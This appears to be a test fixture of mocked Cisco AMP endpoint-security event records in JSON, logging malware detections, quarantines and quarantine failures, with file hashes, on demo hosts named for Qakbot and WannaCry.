+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0
fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
